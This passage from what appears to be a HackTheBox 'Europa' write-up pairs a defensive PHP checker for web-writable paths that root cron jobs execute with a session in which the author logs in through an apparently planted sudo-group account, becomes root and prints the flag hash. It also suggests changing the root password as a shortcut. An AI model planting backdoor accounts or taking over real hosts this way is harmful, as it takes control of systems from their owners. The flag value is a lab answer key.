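function writableByNonRoot(int $uid, int $gid, int $mode): bool {
    if ($uid !== 0 && ($mode & 0200)) return true;   // non-root owner can write
    if ($gid !== 0 && ($mode & 0020)) return true;   // non-root group can write
    return (bool)($mode & 0002);                     // anyone can write
}

// $fs maps path => [uid, gid, mode] (mode as returned by stat()), or null to
// use the live filesystem. Returns human-readable findings; empty = clean.
function auditPrivilegedTarget(string $path, ?array $fs = null): array {
    $lookup = function (string $p) use ($fs): ?array {
        if ($fs !== null) return $fs[$p] ?? null;
        $st = @stat($p);
        return $st === false ? null : [$st['uid'], $st['gid'], $st['mode']];
    };
    $findings = [];

    // Every directory from / down to the parent: whoever can write one of
    // them can rename or replace the target, whatever the target's own mode.
    $dirs = [];
    for ($d = dirname($path); ; $d = dirname($d)) {
        $dirs[] = $d;
        if ($d === '/' || $d === '.') break;
    }
    foreach (array_reverse($dirs) as $d) {
        $e = $lookup($d);
        if ($e !== null && writableByNonRoot(...$e)) {
            $findings[] = sprintf('%s: directory writable by non-root (uid=%d gid=%d mode=%o)',
                                  $d, $e[0], $e[1], $e[2] & 0777);
        }
    }

    $e = $lookup($path);
    if ($e === null) {
        $findings[] = "$path: target does not exist; anyone who can write its directory can create it";
    } elseif (writableByNonRoot(...$e)) {
        $findings[] = sprintf('%s: target writable by non-root (uid=%d gid=%d mode=%o)',
                              $path, $e[0], $e[1], $e[2] & 0777);
    }
    return $findings;
}

// Constructed model of the listings in the write-up (0 = root, 33 = www-data).
$europaModel = [
    '/'                           => [0, 0,  040755],
    '/var'                        => [0, 0,  040755],
    '/var/www'                    => [0, 0,  040755],
    '/var/www/cronjobs'           => [0, 0,  040755],   // assumed
    '/var/www/cronjobs/clearlogs' => [0, 0, 0100755],
    '/var/www/cmd'                => [0, 33, 040775],   // drwxrwxr-x root www-data
    // /var/www/cmd/logcleared.sh is absent on purpose: a dangling exec target
];

foreach (['/var/www/cronjobs/clearlogs', '/var/www/cmd/logcleared.sh'] as $target) {
    echo $target, ":\n";
    $found = auditPrivilegedTarget($target, $europaModel);
    if (!$found) echo "  ok\n";
    foreach ($found as $line) echo "  $line\n";
}
```

Against the model, clearlogs itself comes back clean and logcleared.sh produces two findings: the group-writable /var/www/cmd and the missing target. Drop the second argument (`auditPrivilegedTarget('/var/www/cmd/logcleared.sh')`) to run the same check on a live host; the fix on the box would be a root-owned, 755 /var/www/cmd with the script present, or no exec() of a web-writable path from a root job at all.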
root@n0w4n:~/opt/htb/europa# ssh n0w4n@10.10.10.22
n0w4n@10.10.10.22's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-81-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Fri Jul  6 17:09:50 2018 from 10.10.14.3
$ id
uid=1001(n0w4n) gid=1001(n0w4n) groups=1001(n0w4n),27(sudo)
$ sudo -i
[sudo] password for n0w4n:
root@europa:~# cd /root
root@europa:~# ls -lah
total 32K
drwx------  4 root root 4.0K Jun 23  2017 .
drwxr-xr-x 23 root root 4.0K Jun 23  2017 ..
-rw-------  1 root root    1 Dec 24  2017 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  2 root root 4.0K May 12  2017 .cache
drwxr-xr-x  2 root root 4.0K Apr 19  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Jun 23  2017 root.txt
root@europa:~# cat root.txt
7f19438b27578e4fcc8bef3a029af5a5
And done.
An easier and quicker way to get the flag would have been to change the root password and SSH in as root, or simply to copy /root/root.txt into a readable file.
But hey... there are always other ways to get things done.